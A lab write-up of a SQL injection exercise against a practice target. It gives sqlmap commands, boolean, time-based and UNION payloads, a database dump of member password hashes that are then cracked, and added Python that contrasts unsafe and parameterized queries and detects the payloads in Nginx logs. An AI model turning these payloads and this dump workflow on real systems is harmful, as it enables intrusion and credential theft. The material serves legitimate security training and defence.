Manual SQL injection vulnerability test (MySQL database, string type)
I. Vulnerability hypothesis
1. First, enumerate every URL of the application
(at first I missed the second URL and got stuck)
2. URL1 is a POST injection
3. URL2 is a GET injection
According to the hint, the injection point is URL2
II. Vulnerability detection
Detection approach:
1. Use sqlmap (preferred)
2. Manual injection
# Test whether the parameter is injectable
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch
# -o turns on all of sqlmap's performance optimization switches
# --batch accepts the default answer to every interactive prompt
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=tingjigonggao' AND 2478=2478 AND 'hRkp'='hRkp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=tingjigonggao' AND (SELECT 4528 FROM (SELECT(SLEEP(5)))CUeE) AND 'gDuR'='gDuR
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-4314' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626271,0x69796a61554c7961684f426c4a77437850475565696958776d544e4e7549794a68476e6d4e677162,0x716b707171),NULL-- -
[09:32:54] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
# From sqlmap's results the injection type is:
# GET, string type, single-quote context
# boolean-based blind, time-based blind, UNION query
# Dump the whole database
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -a
# -a dumps everything; not recommended as a first step
# Current database
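To make the "string type, single-quote context" finding concrete, the following is an added example (not code from the writeup or from the target application) that rebuilds the `new_list.php?id=...` lookup in two forms: a concatenated query of the kind that lets sqlmap's boolean-based payload from above close the `'` literal and append SQL, and a parameterized query that treats the whole value as data. An in-memory SQLite database stands in for the MySQL/MariaDB backend (an assumption; the boolean payload is plain ANSI SQL so it behaves the same on both), and the table and row are constructed.

```python
import sqlite3

# sqlmap's boolean-based blind payload as reported against the id parameter.
PAYLOAD = "tingjigonggao' AND 2478=2478 AND 'hRkp'='hRkp"


def make_db():
    # Constructed stand-in for the target's data: one notice row keyed by id.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notice (id TEXT, title TEXT)")
    conn.execute("INSERT INTO notice VALUES ('tingjigonggao', 'constructed notice')")
    return conn


def lookup_vulnerable(conn, user_id):
    # String concatenation: the single quote in the input closes the literal,
    # so everything after it is parsed as SQL. Same pattern as a GET string-type
    # injection in a PHP page that builds its query with "... WHERE id='$id'".
    sql = "SELECT title FROM notice WHERE id='" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Parameterized query: the value is bound separately from the SQL text,
    # so quotes and keywords inside it are just characters of the id.
    return conn.execute("SELECT title FROM notice WHERE id=?", (user_id,)).fetchall()


def demo():
    conn = make_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, "tingjigonggao"),
        "vuln_payload": lookup_vulnerable(conn, PAYLOAD),
        "safe_normal": lookup_safe(conn, "tingjigonggao"),
        "safe_payload": lookup_safe(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows}")
```

The vulnerable lookup returns the notice row for both the plain id and the payload, which is exactly the "page looks the same" oracle a boolean-based blind test relies on; the parameterized lookup returns the row only for the plain id and nothing for the payload, because no row has that literal string as its id.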
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch --current-db
#current database: 'mozhe_discuz_stormgroup'
# All databases
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch --dbs
# available databases[5]
# [*] information_schema
# [*] mozhe_discuz_stormgroup
# [*] mysql
# [*] performance_schema
# [*] test
# All tables in the current database
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' --tables
# Database: mozhe_discuz_stormgroup
# [2 tables]
# +-------------------+
# | notice |
# | stormgroup_member |
# +-------------------+
# Columns of a given table in the current database
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' -T 'stormgroup_member' --columns
# Database: mozhe_discuz_stormgroup
# Table: stormgroup_member
# [4 columns]
# +----------+--------------+
# | Column | Type |
# +----------+--------------+
# | name | varchar(20) |
# | status | int(11) |
# | id | int(11) |
# | password | varchar(255) |
# +----------+--------------+
# Contents of a given table in the current database
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' -T 'stormgroup_member' --dump
# Database: mozhe_discuz_stormgroup
# Table: stormgroup_member
# [2 entries]
# +----+--------+----------+----------------------------------+
# | id | name | status | password |
# +----+--------+----------+----------------------------------+
# | 2 | mozhe | 0 | 356f589a7df439f6f744ff19bb8092c0 |
# | 1 | mozhe | 1 | 22b618b90f098a0e180ace5c992566a8 |
# +----+--------+----------+----------------------------------+
mozhe 356f589a7df439f6f744ff19bb8092c0
mozhe 22b618b90f098a0e180ace5c992566a8
These are presumably MD5 hashes; looking them up on cmd5 gives:
mozhe dsan13
mozhe 883073
Logging in with the second password succeeds
III. Summary
1. Injection type of this target range
# GET, string type, single-quote context
# boolean-based blind, time-based blind, UNION query
2. Collect the page's URLs thoroughly, i.e. collect every possible injection point
3. Prefer sqlmap; for manual injection methods, refer to the sql-lab blog posts
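From the defender's side, the three techniques sqlmap confirmed (boolean-based blind, time-based blind, UNION) each leave a recognizable trace in the web server's access log, and the writeup notes the target runs Nginx. The following is an added example (not part of the writeup) that parses Nginx combined-format log lines, URL-decodes each query parameter and flags values matching those techniques. The log lines are constructed: the payloads are the ones sqlmap reported above, while the client IPs, timestamps, sizes and user agents are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Nginx combined-format access log. The first line is a normal
# request; the other three carry the payloads sqlmap reported for the id parameter.
SAMPLE_LOG = r"""
192.0.2.10 - - [10/Oct/2023:09:31:02 +0800] "GET /new_list.php?id=tingjigonggao HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2023:09:32:51 +0800] "GET /new_list.php?id=tingjigonggao%27%20AND%202478%3D2478%20AND%20%27hRkp%27%3D%27hRkp HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
192.0.2.77 - - [10/Oct/2023:09:32:53 +0800] "GET /new_list.php?id=tingjigonggao%27%20AND%20%28SELECT%204528%20FROM%20%28SELECT%28SLEEP%285%29%29%29CUeE%29%20AND%20%27gDuR%27%3D%27gDuR HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
192.0.2.77 - - [10/Oct/2023:09:32:54 +0800] "GET /new_list.php?id=-4314%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626271%2C0x69796a61554c7961684f426c4a77437850475565696958776d544e4e7549794a68476e6d4e677162%2C0x716b707171%29%2CNULL--%20- HTTP/1.1" 200 5300 "-" "sqlmap/1.7"
"""

# Nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\d+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Heuristics keyed to the techniques sqlmap confirmed, applied to the decoded
# parameter value. A quote followed by a boolean operator or UNION is the
# signature of string-context (single-quote) injection; SLEEP/BENCHMARK of the
# time-based variant; a trailing comment of payloads that discard the rest of the query.
RULES = {
    "boolean-blind": re.compile(r"'\s*(and|or)\b", re.I),
    "time-blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "union": re.compile(r"'\s*union\b", re.I),
    "comment-tail": re.compile(r"(--|#)[\s-]*$"),
}


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_value(value):
    """Names of the rules that match one URL-decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]


def analyze(log_text):
    """Flag every query parameter in the log whose decoded value matches a rule."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # not combined format; skip rather than guess
        query = urlsplit(rec["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "param": name,
                    "ua": rec["ua"], "reasons": hits,
                })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} ua={f['ua']} -> {', '.join(f['reasons'])}")
```

Running it flags the three payload requests and leaves the normal request alone. The rules deliberately work on the decoded value rather than the raw URL, since the quote and keywords arrive percent-encoded, and they do not depend on the `sqlmap/...` user agent, which is trivially changed; the user agent is kept in the finding only as corroboration.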